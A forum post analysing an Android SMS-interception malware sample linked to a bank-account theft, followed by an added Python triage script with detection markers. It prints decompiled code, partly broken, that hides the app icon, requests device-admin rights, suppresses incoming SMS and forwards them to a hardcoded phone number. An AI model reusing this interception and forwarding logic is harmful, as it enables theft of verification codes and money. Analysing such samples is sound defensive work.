吾爱游客
Posted on 2020-6-21 19:41
Requested ID: lhx077
Personal email: 1955717323@qq.com
In a family WeChat group I saw a friend say that a friend of theirs had been robbed of 50,000 yuan, and they provided a sample of the Android malware involved. A brief analysis follows:
The sample is a fairly simple SMS-intercepting malicious program. My guess at how the theft happened: the victim's online-banking account and password were stolen, and the phone bound to the online-banking account was also infected with this malware, so the verification codes were intercepted and the criminals were able to transfer all of the money out of the victim's online-banking account.
1. Part of the code from the AndroidManifest.xml file is as follows:
```java
// Decompiler output as posted. Quoted identifiers, the stray assignments after
// setComponentEnabledSetting and the unreachable/empty blocks are decompiler
// artifacts and are left as they appeared; only comments have been added.
public class MainActivity extends Activity {
    protected void onCreate(Bundle p1) {
        super.onCreate(p1);
        setContentView(0x0);
        // The victim's own number, reported back in the "installed" SMS
        String number = queryPhonetNumber();
        sendSms(getResources().getString(0x7f060003), number + "\u5df2\u7ecf\u5b89\u88c5\u6210\u529f!");
        // Disables its own launcher component so the icon disappears:
        // 0x2 = PackageManager.COMPONENT_ENABLED_STATE_DISABLED, 0x1 = DONT_KILL_APP
        PackageManager p = getPackageManager();
        ComponentName comName = new ComponentName("com.ghy4tu458.ghy4tu458", "com.ghy4tu458.ghy4tu458.MainActivity");
        p.setComponentEnabledSetting(comName, "com.ghy4tu458.ghy4tu458", "com.ghy4tu458.ghy4tu458.MainActivity");
        "com.ghy4tu458.ghy4tu458" = 0x2;
        "com.ghy4tu458.ghy4tu458.MainActivity" = 0x1;
        // Asks the user to grant device-administrator rights (makes uninstalling harder)
        DevicePolicyManager dm = (DevicePolicyManager) getSystemService("device_policy");
        ComponentName mAdminName = new ComponentName(this, MAdmin.class);
        Intent intent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
        intent.putExtra("android.app.extra.DEVICE_ADMIN", mAdminName);
        startActivity(intent);
        finish();
    }

    public void sendSms(String p1, String p2) {
        SmsManager smsManager = SmsManager.getDefault();
        if (p2.length() > 0x46) {
            unknown_type contents = smsManager.divideMessage(p2);
            if (!contents.iterator().hasNext()) {
            }
            sms = (String) contents.iterator().next();
            return;
            smsManager.sendTextMessage(p1, 0x0, sms, 0x0, 0x0);
        }
        try {
            Log.i("tag", p1);
            smsManager.sendTextMessage(p1, 0x0, p2, 0x0, 0x0);
            Log.i("tag", p2);
            return;
        } catch (Exception e) {
            Log.i("tag", e);
            e.printStackTrace();
        }
    }

    public String queryPhonetNumber() {
        // Reads the device's own line number via TelephonyManager
        telephonyManager = getSystemService("phone");
        String number = telephonyManager.getLine1Number();
        if ((number == null) || (number.length() == 0)) {
        }
        return number;
    }
}
```
The key part is:
```java
String number = queryPhonetNumber();
sendSms(getResources().getString(0x7f060003), number + "\u5df2\u7ecf\u5b89\u88c5\u6210\u529f!");
```
The queryPhonetNumber function obtains the host's phone number, and the program then sends an SMS to the number that the resource “0x7f060003” corresponds to.
The public.xml file is as follows:
```xml
<resources>
    <public type="drawable" name="ic_launcher" id="0x7f020000" />
    <public type="layout" name="activity_main" id="0x7f030000" />
    <public type="xml" name="my_admin" id="0x7f040000" />
    <public type="dimen" name="activity_horizontal_margin" id="0x7f050000" />
    <public type="dimen" name="activity_vertical_margin" id="0x7f050001" />
    <public type="string" name="app_name" id="0x7f060000" />
    <public type="string" name="action_settings" id="0x7f060001" />
    <public type="string" name="hello_world" id="0x7f060002" />
    <public type="string" name="number" id="0x7f060003" />
    <public type="style" name="AppBaseTheme" id="0x7f070000" />
    <public type="style" name="AppTheme" id="0x7f070001" />
</resources>
```
As can be seen, “0x7f060003” corresponds to the name “number”.
The string.xml file is as follows:
```xml
<resources>
    <string name="app_name">bb</string>
    <string name="action_settings">Settings</string>
    <string name="hello_world">Hello world!</string>
    <string name="number">18663146152</string>
</resources>
```
As can be seen, “number” corresponds to the phone number “18663146152”.
And the string "\u5df2\u7ecf\u5b89\u88c5\u6210\u529f!", once the Unicode escapes are decoded, reads “已经安装成功!” (“installed successfully!”).
So at this point we know that once the app is activated, it sends an SMS to the phone number 18663146152 with the content “xxxxxxxxxx已经安装成功” (“xxxxxxxxxx installed successfully”), where xxxxxxxxxx is the victim's phone number.
3. The MyReceiver file is as follows:
```java
// Decompiler output as posted. Quoted identifiers, the empty for-loop body,
// the undeclared originalNumber/sms/p3 and the unreachable statements are
// decompiler artifacts and are left as they appeared; only comments have been added.
public class MyReceiver extends BroadcastReceiver {
    private static Context context;

    public void onReceive(Context p1, Intent p2) {
        Log.i("tag", "xxxxxxx");
        context = p1;
        // Aborts the ordered SMS_RECEIVED broadcast so lower-priority receivers
        // (the user's SMS app) never see the message
        abortBroadcast();
        Bundle bundle = p2.getExtras();
        // Raw PDUs of the incoming SMS
        Object[] messages = (Object[]) bundle.get("pdus");
        SmsMessage[] smsMessage = new SmsMessage[messages.length];
        StringBuffer sb = new StringBuffer();
        for (int n = 0x0; n >= messages.length; n = n + 0x1) {
        }
        smsMessage[n] = SmsMessage.createFromPdu((byte[]) messages[n]);
        sb.append(smsMessage[n].getMessageBody());
        originalNumber = smsMessage[n].getOriginatingAddress();
        System.out.println(sb);
        // Forwards "<sender>，内容: <body>" to the number stored in R.string.number
        String ret = originalNumber + "\uff0c\u5185\u5bb9: " + sb;
        sendSms(p1.getResources().getString(0x7f060003), ret);
    }

    public static boolean isMobileNO(String p1) {
        return true;
    }

    public static void sendSms(String p1, String p2) {
        if (!isMobileNO(p1)) {
            return;
        }
        SmsManager smsManager = SmsManager.getDefault();
        if (p2.length() > 0x46) {
            unknown_type contents = smsManager.divideMessage(p2);
            if (contents.iterator().hasNext()) {
                sms = (String) contents.iterator().next();
                smsManager.sendTextMessage(p2, 0x0, sms, 0x0, 0x0);
            }
        }
        try {
            smsManager.sendTextMessage(p2, 0x0, p3, 0x0, 0x0);
            return;
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
In the onReceive function it intercepts SMS messages received by the host and sends an SMS to the number 18663146152 with the content “xxxxxxxxxx内容为:bbbbbbbbb……” (“xxxxxxxxxx content: bbbbbbbbb……”), where xxxxxxxxxx is the victim's phone number and bbbbbbbbb…… is the content of the SMS the victim's phone received.
(Also: the malware author used “sb” as the name of the variable holding the SMS content, which shows how brazen they are.)
That concludes the code analysis of this malware. I am not an Android developer and have only been working with it for a short time, so my understanding is fairly shallow; where the analysis is wrong, I sincerely ask everyone to correct me.
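As an added example (not code from the original post or from the sample), the following Python triage helper automates the two manual steps the analysis above performs: resolving a getString(0x7f06xxxx) resource id through public.xml and strings.xml, and decoding the Java \uXXXX escapes in the decompiled strings. It also tags the capability markers visible in the two classes (abortBroadcast, "pdus", ADD_DEVICE_ADMIN, setComponentEnabledSetting, sendTextMessage). The embedded XML and decompiler lines are constructed from the values quoted in the post; the INDICATORS table and all function names are my own.

```python
"""Triage helper for decompiled Android SMS-interceptor code.

Added example; not code from the original post or the malware sample.
The embedded public.xml / strings.xml / decompiler lines are constructed
from the values quoted in the post so the script runs offline.
"""
import re
import xml.etree.ElementTree as ET

# Constructed from the post's public.xml (string entries only).
PUBLIC_XML = """<resources>
  <public type="string" name="app_name" id="0x7f060000" />
  <public type="string" name="action_settings" id="0x7f060001" />
  <public type="string" name="hello_world" id="0x7f060002" />
  <public type="string" name="number" id="0x7f060003" />
</resources>"""

# Constructed from the post's strings.xml.
STRINGS_XML = """<resources>
  <string name="app_name">bb</string>
  <string name="action_settings">Settings</string>
  <string name="hello_world">Hello world!</string>
  <string name="number">18663146152</string>
</resources>"""

# Constructed decompiler lines mirroring MainActivity and MyReceiver in the post.
DECOMPILED = [
    'sendSms(getResources().getString(0x7f060003), number + "\\u5df2\\u7ecf\\u5b89\\u88c5\\u6210\\u529f!");',
    'p.setComponentEnabledSetting(comName, 0x2, 0x1);',
    'Intent intent = new Intent("android.app.action.ADD_DEVICE_ADMIN");',
    'abortBroadcast();',
    'Object[] messages = (Object[]) bundle.get("pdus");',
    'sendSms(p1.getResources().getString(0x7f060003), ret);',
    'smsManager.sendTextMessage(p1, null, p2, null, null);',
]


def load_resource_table(public_xml, strings_xml):
    """Return {resource_id: (name, value)} for string resources.

    public.xml maps id -> name and strings.xml maps name -> value; joining
    the two is what the post did by hand for 0x7f060003.
    """
    names = {}
    for pub in ET.fromstring(public_xml).iter("public"):
        if pub.get("type") == "string":
            names[int(pub.get("id"), 16)] = pub.get("name")
    values = {s.get("name"): (s.text or "")
              for s in ET.fromstring(strings_xml).iter("string")}
    return {rid: (name, values.get(name)) for rid, name in names.items()}


def decode_java_unicode(s):
    """Expand Java-source \\uXXXX escapes (e.g. the 'installed' message)."""
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), s)


# Matches getString(0x........), optionally preceded by "<obj>.getResources()."
GETSTRING = re.compile(
    r"(?:\w+\.)?(?:getResources\(\)\.)?getString\((0x[0-9a-fA-F]{8})\)")


def annotate(line, table):
    """Inline the resolved string literal and decode escapes in one line."""
    def repl(m):
        name, value = table.get(int(m.group(1), 16), (None, None))
        if value is None:
            return m.group(0)          # unknown id: leave untouched
        return f'"{value}" /* R.string.{name} */'
    return decode_java_unicode(GETSTRING.sub(repl, line))


# Capability markers drawn from what the two classes in the post do (my own table).
INDICATORS = {
    "abortBroadcast(": "suppresses the SMS_RECEIVED broadcast for other receivers",
    '"pdus"': "reads raw SMS PDUs from an incoming-SMS broadcast",
    "ADD_DEVICE_ADMIN": "requests device-administrator rights",
    "setComponentEnabledSetting(": "toggles a component (2 = DISABLED hides the launcher icon)",
    "sendTextMessage(": "sends SMS programmatically",
}


def tag_indicators(lines):
    """Return {marker: [1-based line numbers]} for markers found in lines."""
    hits = {}
    for n, line in enumerate(lines, 1):
        for marker in INDICATORS:
            if marker in line:
                hits.setdefault(marker, []).append(n)
    return hits


if __name__ == "__main__":
    table = load_resource_table(PUBLIC_XML, STRINGS_XML)
    for line in DECOMPILED:
        print(annotate(line, table))
    for marker, where in tag_indicators(DECOMPILED).items():
        print(f"lines {where}: {INDICATORS[marker]}")
```

Run against real decompiler output, point PUBLIC_XML and STRINGS_XML at the res/values files that apktool extracts; any getString(...) whose id is not a string resource is left untouched rather than guessed, and the indicator list is only a starting point for triage, not a verdict on the sample.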